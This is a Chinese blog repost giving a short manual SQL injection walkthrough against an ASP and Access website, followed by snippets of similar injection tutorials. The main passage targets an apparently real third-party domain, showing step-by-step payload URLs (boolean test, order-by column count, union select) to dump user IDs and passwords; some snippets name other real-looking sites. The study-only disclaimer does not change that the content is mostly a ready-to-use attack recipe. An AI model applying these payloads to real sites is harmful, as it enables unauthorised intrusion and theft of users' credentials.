手工注入asp+access网站(union语句)

最新推荐文章于 2021-11-28 20:42:53 发布
最新推荐文章于 2021-11-28 20:42:53 发布
阅读量210 收藏
点赞数
原文链接:http://www.cnblogs.com/baogg/articles/1989388.html
版权
注入点:http://www.romance-sky.com/authorlist.asp?id=227 
分析:and 1=1 正常and 1=2出错.存在注入漏洞 
字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227 order by 7正常.表示字段数为7 
http://www.romance-sky.com/authorlist.asp?id=227 and 1=2 union select 1,2,3,4,5,6,7 from 表名 
返回2,4(字符型),5(字符型)处可以利用. 
http://www.romance-sky.com/authorlist.asp?id=227%20and%201=2%20union%20select%201,id,3,密码,name,6,7%20from%20表名 
这样就可以得到相应的用户名和密码. 
上文中的表名和密码等字段名是假设的. 
本文仅供学习研究,请勿用于任何不法行为,否则后果自负.  

转载于:https://www.cnblogs.com/baogg/articles/1989388.html

weixin_30877227
关注
不支持union select 时的asp手工注入方法
MyBack
06-10 2772
首先看一个简单的站点 这种站点, 一眼看了, 都是有漏洞的多。 上面的站, 是支持union select 注入的。 但这里说的是不支持union select 注入的情况, 所以, 我们这里不利用union select 来注入。(假设不支持) 进入产品展示里面, 随便点一个产品, 都有注入, 我们拿这个来做例子。 http://www.joesd.com/
62.网络安全渗透测试—[SQL注入篇1]—[Access+Asp-手工注入]
qwsn
08-08 2282
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Access 数据库相关概念 1、Access 数据库特点:特有/共有 2、Access 数据库结构:表->字段/列->行数据/记录 二、Access+Asp 手工注入 1、Access 数据库注入步骤:6步骤 2、Access 数据库注入示例:
简单ASP手工注入流程
09-27
假设这里我们猜解出来的16位管理员密码是:7a57a5a743894a0e 有经验的就一眼看出这是经过MD5加密过的密文, 需要解密后才能登陆使用,于是我们就在解密网站或者使用工具解密此密文,得出密码:admin 经过幸苦劳累的手工注入,我们搞定了管理员账户为:admin520,密码为:admin,接下来我们就继续猜测管理员后台登陆网址 常见的ASP的管理员后台登陆网址如下:
2-Web安全——union联合注入
网络安全
05-05 795
1. 联合查询注入 联合查询注入是使用union联合查询进行注入的一种方式,联合注入方式的前提是在一个网站的页面中,后端执行SQL语句查询数据库中的数据,然后客户端将数据显示在页面中,通过union联合查询注入可以获取到目标网站的数据库里的所有用户名和密码。 2. MYSQL相关知识 那如何获取数据库中的用户名和密码等数据呢? 在此之前需要了解MYSQL数据库的相关知识,MYSQL ...
asp联合查询
weixin_30483013的博客
06-08 356
<% set rss=server.createobject("adodb.recordset") ssql="select * from [dormitory] left join [allot] on allot.r_id=dormitory.r_id and dormitory.build=allot.build where dormitory.build='"&amp...
asp+Access手工注入案例
zsch591488385的专栏
10-28 1775
今天在空间发了篇日志,问朋友们有没有什么需要我这个小菜检测一下的网站,日志发出后,有位朋友来留了一个网站的地址: 呵呵,当时听那朋友说的,他们好多人都不行,拿不下,我被吓到了,呵呵,想着别人那么多人都拿不下的站,我一个小菜鸟能拿下? 呵呵,不过还是抱着试试看的心情打开了这个网站,在主站转了转,用的是CMS,由于俺是小菜,对CMS不懂,于是找到后台,看可否直接登录,后台地址为: htt
ASP+ACCESS带SQL注入网站源码
05-20
对于初学者来说,"ASP+ACCESS带SQL注入网站源码"是一个理想的实践平台,可以深入理解SQL注入的工作原理。你可以通过分析源码,找出其中的漏洞,比如查看是否使用了动态构造SQL语句,或者是否存在用户输入直接拼接到...
Access数据库手工注入
IerkeU的博客
11-28 1831
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP
asp+access sql手工注入步骤
热门推荐
Geecky的博客
05-02 1万+
理论介绍 数据库结构 access数据库 表 列 单元数据 实例 目标网址:http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513 网站域名:http://127.0.0.1:81/0/0/ 文件目录:Production 网站文件:PRODUCT_DETAIL.asp
access+asp演示
weixin_43607936的博客
02-24 561
access注入 1,acess数据库介绍 2,access数据库调用分析 3,acess注入原理 4,acess注入工具 1.acess数据库介绍 Microsoft Office access是由微软发布的关系型数据库管理系统。它结合了MicrosoftJetDatabase Engine和图形用户界面两项特点,是Microsoft Office的系统程序之一。 数据库后缀名字 *.mdb 2.access数据库调用分析 连接分析 http://127.0.0.1:99/pro.asp?id=40 找
ASP+acc手工注入
rjgcwl的专栏
01-14 629
ASP+acc手工注入 SQL注入这么长时间,看见有的朋友还是不会手工注入,那么我来演示一下。高手略过。我们大家知道,一般注入产生在没经过虑的变量上,像ID?=XX这样的。下面以这个网址为例:http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 返回了正常http://zs
asp和php注入,asp手工注入
weixin_42181686的博客
03-12 151
判断是否存在注入http://URL.asp?id=24 and 1=1 返回了正常http://URL.asp?id=24 and 1=2 返回了错误注入存在判断数据库是ACC或MSS:ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,MSS的系统表是sysobjects,在WEB环境下有访问权限。http://URL.asp?id=24 and (select cou...
asp mysql 注入_记一次有意义的asp手工注入
weixin_35355431的博客
02-23 460
今天在空间发了篇日志,问朋友们有没有什么需要我这个小菜检测一下的网站,日志发出后,有位朋友来留了一个网站的地址:呵呵,当时听那朋友说的,他们好多人都不行,拿不下,我被吓到了,呵呵,想着别人那么多人都拿不下的站,我一个小菜鸟能拿下?呵呵,不过还是抱着试试看的心情打开了这个网站,在主站转了转,用的是CMS,由于俺是小菜,对CMS不懂,于是找到后台,看可否直接登录,后台地址为:但是,打开之后发现页面跳转...
SQL注入基础实战(i春秋)
Jaychouzzk
08-17 3489
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
ASP注入原理及手工入侵经过
古剑楠的专栏
08-24 6921
 首先声明几点:一、关于发这篇帖子没有其他的意思,只是想和大家一起学习而已,在学习中提高自己。二、关于郑州某大学,我已经和他们的管理员联系了,告诉了他们网站的这个漏洞,相信他们很快就会补好。入侵不存在任何恶意!!!三、就目前来说,我昨晚试的,还有很多ASP网站存在SQL注入漏洞。所以请不要高非法入侵否则后果自负。四、此篇不是写给高手看的。:)大虾们不要笑我菜。其实我是很菜。好了,最后转贴请注明出处
网络安全系列之四 手工SQL注入(ASP)
weixin_33882443的博客
10-07 297
SQL注入是***对数据库进行***的常用手段之一,其核心思想在于:***在正常的需要调用数据库数据的URL后面构造一段数据库查询代码,然后根据返回的结果,从而获得想要的某些数据。下面我们就对之前已经搭建好的***平台进行SQL注入,最终目的是获得网站的管理员账号和密码。目标服务器IP地址:192.168.80.129,***主机IP地址:192.168.80.128。 (1)寻找注入点随便打开一...
ASP怎样实现记录合并查询
hongmaohouzi的专栏
02-27 792
将表里的数据,合并为这样的效果; if exists(select * from sysobjects where name=itpub and type=u) drop table itpub --创建一个表create table [dbo].[itpub](id int ,munid int,item varchar(100))--象表里面插如记录insert
变态方法突破过滤UNION+SELECT继续注入
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注射点:     //*ps 此点目前流行的注射工具射不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
Access数据库手工注入深度解析:实战技巧与检测方法
本文档是一篇针对ASP环境下的Access数据库手工注入技巧的详细教程,特别适合初学者阅读。文章主要介绍以下几个关键知识点: 1. 数字型注入: 数字型注入通过设置id参数,如`id=19`,利用的是直接拼接查询语句的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值